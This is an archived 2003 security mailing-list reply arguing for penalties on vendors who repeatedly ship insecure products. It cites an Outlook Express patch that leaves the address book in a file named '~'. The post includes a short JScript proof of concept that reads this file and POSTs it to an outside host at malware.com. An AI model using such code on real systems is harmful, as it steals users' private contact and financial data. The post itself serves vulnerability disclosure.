Re: Security researchers organization

http-equiv_at_excite.com
Date: 11/18/03

  • Next message: Russ: "MinorRev: Microsoft Security Bulletin MS03-041 - Vulnerability in Authenticode Verification Could Allow Remote Code Execution (823182)" 
    Date:         Tue, 18 Nov 2003 19:30:50 -0000
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM

    <!--

    What I would like to see
    created is an organization that would promote and protect the interests
    of security researchers, plain and simple. There is currently no
    organization that exists solely to guide, help and represent security
    researchers on a larger scale, yet we can all recognize the need.

     -->

    I don't think those capable of actually doing research require hand holding by anyone.

    <!--

    We are a wide, international and differing group of researchers, some
    with malicious and others with altruistic intents for finding security
    vulnerabilities. Despite our differences we have much in common - we are
    deeply interested in advancing our knowledge of security and information
    technology, we find vulnerabilities, we want the vendor to know about
    these at some point in time and we want to be accredited for our
    findings.

     -->

    Can this not already be achieved by following the minimum requirement of any one particular vendor. Or following any one of the number of so-called disclosure guidelines already tabled.

    While some may want accreditation and pat on the back, others may want the continual flow of effluent onto the internet to cease. Some want habitual offenders penalised. Monetarily. Some want an authoritative body like a UL or CSA or VDE or SEMKO or BS to stamp their mark on product entering the internet. 'REJECTED' for junk product that finds it's way repeatedly onto the internet.

    Allow me to give you an example of a habitual offender:

    There is a peculiar file that appears on almost everyone's computers since April of 2003. Peculiar enough in that all it is, is a tilde "~". Inside that file is the entire contents of the user's address book. In fact, the file is exactly that. The user's address book. Simply adding the extension of *.wab to it, opens up none other than the Windows Address Book. All names, addresses and whatever critically private information one puts in there. Some people even put their banking and credit card details in there believe it or not.

    This peculiar little file is an oddity created by the April 2003, Cumulative Patch for Outlook Express (330994). Now seven months ago. A most useful file in that it is created in a number of well known places including "C:\". Knowing the file name and location makes it quite easy to 'steal' this file and invade the privacy of the user of the computer where it still resides today. Some seven months after the vendor knowing full well about it. [I believe there is a pending lawsuit against the same vendor along the same lines at this time].

    You see:

    var x = new ActiveXObject("Microsoft.XMLHTTP");
    x.Open("GET", "file:///C:/~",0);
    x.Send();
    var y = new ActiveXObject ("Microsoft.XMLHTTP");
    y.Open("POST", "http://www.malware.com/forthetaking.php", false);
    y.Send(x.responseBody);

    Will get and post that file. With a little bit of effort and timing, all one needs to do is steal that file and invade the privacy of the "customer" ! And who's fault will that be? Mine for providing this glaringly obvious scenario 'for free' or the vendor sitting on their hands for seven months thinking about it for a fee.

    REJECT ! the product and keep it off the internet ! 

    --
http://www.malware.com
-----
Marcus Ranum's new book "The Myth of Homeland Security" is now out and
is available from http://www.amazon.com/ranum In this hard-hitting
review of the homeland security business, Ranum shows us how the problem
is vastly harder than it's being made to sound, and how special
interests, *** covering, and bureaucracy are threatening to derail any
chance of making progress.
-----
  • Next message: Russ: "MinorRev: Microsoft Security Bulletin MS03-041 - Vulnerability in Authenticode Verification Could Allow Remote Code Execution (823182)"